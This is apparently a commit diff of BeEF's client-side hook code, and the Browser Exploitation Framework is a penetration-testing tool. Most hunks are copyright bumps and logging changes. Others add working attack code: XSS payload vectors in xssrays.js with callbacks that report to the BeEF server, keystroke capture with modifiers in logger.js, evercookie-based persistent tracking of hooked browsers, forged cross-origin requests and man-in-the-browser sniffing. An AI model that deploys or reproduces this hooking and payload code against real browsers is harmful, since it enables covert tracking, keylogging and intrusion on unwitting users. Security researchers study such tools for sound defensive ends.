var iframeXsrf = beef.dom.createInvisibleIframe();
var formXsrf = document.createElement('form');
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
formXsrf.setAttribute('enctype', enctype);
var input = null;
for (i in inputs){
@@ -375,11 +468,11 @@ beef.dom = {
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, commands){
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');

2
core/main/client/encode/base64.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/encode/json.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

12
core/main/client/geolocation.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:

4
core/main/client/hardware.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -126,4 +126,4 @@ beef.hardware = {
}
};
beef.regCmp('beef.net.hardware');
beef.regCmp('beef.hardware');

9
core/main/client/init.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -46,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}

1301
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

2
core/main/client/lib/evercookie.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

6
core/main/client/lib/jquery-1.10.2.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

2
core/main/client/lib/jquery-migrate-1.2.1.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

26
core/main/client/logger.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -43,6 +43,7 @@ beef.logger = {
this.y = 0;
this.target = null;
this.data = null;
this.mods = null;
},
/**
@@ -233,17 +234,28 @@ beef.logger = {
*/
parse_stream: function() {
var s = '';
for (var i in this.stream)
{
//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
s += String.fromCharCode(this.stream[i]['char']);
var mods = '';
for (var i in this.stream){
try{
var mod = this.stream[i]['modifiers'];
s += String.fromCharCode(this.stream[i]['char']);
if(typeof mod != 'undefined' &&
(mod['alt'] == true ||
mod['ctrl'] == true ||
mod['shift'] == true)){
mods += (mod['alt']) ? ' [Alt] ' : '';
mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
mods += (mod['shift']) ? ' [Shift] ' : '';
mods += String.fromCharCode(this.stream[i]['char']);
}
}catch(e){}
}
var k = new beef.logger.e();
k.type = 'keys';
k.target = beef.logger.get_dom_identifier();
k.data = s;
k.mods = mods;
return k;
},

8
core/main/client/mitb.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -33,11 +33,11 @@ beef.mitb = {
//GET request
if (method == "GET") {
//GET request -> cross-domain
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}else { //GET request -> same-domain
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
@@ -198,7 +198,7 @@ beef.mitb = {
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-domain, so load the resource in a different tab
// the link is cross-origin, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}

165
core/main/client/net.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -18,21 +18,21 @@
*/
beef.net = {
host:"<%= @beef_host %>",
port:"<%= @beef_port %>",
hook:"<%= @beef_hook %>",
httpproto:"<%= @beef_proto %>",
handler:'/dh',
chop:500,
pad:30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count:0,
cmd_queue:[],
host: "<%= @beef_host %>",
port: "<%= @beef_port %>",
hook: "<%= @beef_hook %>",
httpproto: "<%= @beef_proto %>",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count: 0,
cmd_queue: [],
/**
* Command object. This represents the data to be sent back to BeEF,
* using the beef.net.send() method.
*/
command:function () {
command: function () {
this.cid = null;
this.results = null;
this.handler = null;
@@ -42,7 +42,7 @@ beef.net = {
/**
* Packet object. A single chunk of data. X packets -> 1 stream
*/
packet:function () {
packet: function () {
this.id = null;
this.data = null;
},
@@ -50,7 +50,7 @@ beef.net = {
/**
* Stream object. Contains X packets, which are command result chunks.
*/
stream:function () {
stream: function () {
this.id = null;
this.packets = [];
this.pc = 0;
@@ -58,8 +58,8 @@ beef.net = {
return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
};
this.get_packet_data = function () {
var p = this.packets.shift();
return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
var p = this.packets.shift();
return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
};
},
@@ -68,10 +68,10 @@ beef.net = {
* NOTE: as we are using async mode, the response object will be empty if returned.
* Using sync mode, request obj fields will be populated.
*/
response:function () {
response: function () {
this.status_code = null; // 500, 404, 200, 302
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "<html>…." if not a cross domain request
this.response_body = null; // "<html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
this.was_cross_domain = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
@@ -86,7 +86,7 @@ beef.net = {
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
queue:function (handler, cid, results, callback) {
queue: function (handler, cid, results, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
s.cid = cid;
@@ -107,16 +107,16 @@ beef.net = {
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
send:function (handler, cid, results, callback) {
send: function (handler, cid, results, callback) {
if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
this.queue(handler, cid, results, callback);
this.flush();
}else {
} else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
}catch (e) {
} catch (e) {
this.queue(handler, cid, results, callback);
this.flush();
}
@@ -131,7 +131,7 @@ beef.net = {
* XHR-polling mechanism. If WebSockets are used, the data is sent
* back to BeEF straight away.
*/
flush:function () {
flush: function () {
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
this.cmd_queue.length = 0;
@@ -159,7 +159,7 @@ beef.net = {
* @param: {String} str: the input data
* @param: {Integer} amount: chunk length
*/
chunk:function (str, amount) {
chunk: function (str, amount) {
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
@@ -169,7 +169,7 @@ beef.net = {
* It uses beef.net.request to send back the data.
* @param: {Object} stream: the stream object to be sent back.
*/
push:function (stream) {
push: function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
@@ -191,11 +191,11 @@ beef.net = {
*
* @return: {Object} response: this object contains the response details
*/
request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
if(document.location.port == "" || document.location.port == null){
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
}
}
@@ -220,29 +220,29 @@ beef.net = {
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
dataType: dataType
});
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
} else {
$j.ajaxSetup({
$j.ajaxSetup({
dataType: 'script'
});
});
}
//build and execute the request
$j.ajax({type:method,
url:url,
data:data,
timeout:(timeout * 1000),
$j.ajax({type: method,
url: url,
data: data,
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
success:function (data, textStatus, xhr) {
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
@@ -251,14 +251,14 @@ beef.net = {
response.was_timedout = false;
response.duration = (end_time - start_time);
},
error:function (jqXHR, textStatus, errorThrown) {
error: function (jqXHR, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = jqXHR.responseText;
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
},
complete:function (jqXHR, textStatus) {
complete: function (jqXHR, textStatus) {
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.headers = jqXHR.getAllResponseHeaders();
@@ -288,19 +288,20 @@ beef.net = {
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
*/
forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
// check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
if(document.location.port == "" || document.location.port == null){
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_domain = false;
}
if (domain == "undefined" || path == "undefined") {
return;
}
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_domain = false;
}
}
// build the url
var url = "";
if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -333,7 +334,7 @@ beef.net = {
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
@@ -343,8 +344,8 @@ beef.net = {
});
}
// this is required for bugs in IE so data can be transferred back to the server
if ( beef.browser.isIE() ) {
// this is required for bugs in IE so data can be transferred back to the server
if (beef.browser.isIE()) {
dataType = 'script'
}
@@ -355,14 +356,14 @@ beef.net = {
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
// http server responded successfully
success:function (data, textStatus, xhr) {
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
@@ -373,7 +374,7 @@ beef.net = {
// server responded with a http error (403, 404, 500, etc)
// or server is not a http server
error:function (xhr, textStatus, errorThrown) {
error: function (xhr, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = xhr.responseText;
response.status_code = xhr.status;
@@ -381,33 +382,33 @@ beef.net = {
response.duration = (end_time - start_time);
},
complete:function (xhr, textStatus) {
complete: function (xhr, textStatus) {
// cross-domain request
if (cross_domain) {
response.port_status = "crossdomain";
response.port_status = "crossdomain";
if (xhr.status != 0) {
response.status_code = xhr.status;
} else {
response.status_code = -1;
}
response.status_code = xhr.status;
} else {
response.status_code = -1;
}
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossdomain";
}
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossdomain";
}
if (xhr.getAllResponseHeaders()) {
response.headers = xhr.getAllResponseHeaders();
} else {
response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
if (xhr.getAllResponseHeaders()) {
response.headers = xhr.getAllResponseHeaders();
} else {
response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
if (!response.response_body) {
response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
if (!response.response_body) {
response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
} else {
// same-domain request
@@ -420,8 +421,16 @@ beef.net = {
response.was_timedout = true;
response.response_body = "ERROR: Timed out\n";
response.port_status = "closed";
/*
* With IE we need to explicitly set the dataType to "script",
* so there will be always parse-errors if the content is != javascript
* */
} else if (textStatus == "parsererror") {
response.port_status = "not-http";
if (beef.browser.isIE()) {
response.status_text = "success";
response.port_status = "open";
}
} else {
response.port_status = "open";
}
@@ -434,7 +443,7 @@ beef.net = {
//this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
//http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
clean:function (r) {
clean: function (r) {
if (this.array_has_string_key(r)) {
var obj = {};
for (var key in r)
@@ -445,7 +454,7 @@ beef.net = {
},
//Detects if an array has a string key
array_has_string_key:function (arr) {
array_has_string_key: function (arr) {
if ($j.isArray(arr)) {
try {
for (var key in arr)
@@ -459,7 +468,7 @@ beef.net = {
/**
* Sends back browser details to framework, calling beef.browser.getDetails()
*/
browser_details:function () {
browser_details: function () {
var details = beef.browser.getDetails();
details['HookSessionID'] = beef.session.get_hook_session_id();
this.send('/init', 0, details);

2
core/main/client/net/cors.js
View File

@@ -12,7 +12,7 @@ beef.net.cors = {
},
/**
* Make a cross-domain request using CORS
* Make a cross-origin request using CORS
*
* @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
* @param url {String} url

4
core/main/client/net/dns.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }

2
core/main/client/net/local.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/net/portscanner.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

7
core/main/client/net/requester.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -19,8 +19,7 @@ beef.net.requester = {
handler: "requester",
send: function(requests_array) {
for (i in requests_array) {
for(var i=0; i<requests_array.length; i++){
request = requests_array[i];
beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
@@ -32,8 +31,6 @@ beef.net.requester = {
response_headers: res.headers});
}
);
}
}
};

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

20
core/main/client/os.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -8,6 +8,24 @@ beef.os = {
ua: navigator.userAgent,
/**
* Detect default browser (IE only)
* Written by unsticky
* http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
*/
getDefaultBrowser: function() {
var mt = document.mimeType;
var result = "Unknown"
if (mt) {
if (mt == "Safari Document") result = "Safari";
if (mt == "Firefox HTML Document") result = "Firefox";
if (mt == "Chrome HTML Document") result = "Chrome";
if (mt == "HTML Document") result = "Internet Explorer";
if (mt == "Opera Web Document") result = "Opera";
}
return result;
},
isWin311: function() {
return (this.ua.match('(Win16)')) ? true : false;
},

17
core/main/client/session.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -13,7 +13,8 @@ beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK");
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK");
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK");
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id);
this.ec.evercookie_userdata("BEEFHOOK", id);
this.ec.evercookie_window("BEEFHOOK", id);
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**

4
core/main/client/timeout.js
View File

@@ -1,12 +1,12 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
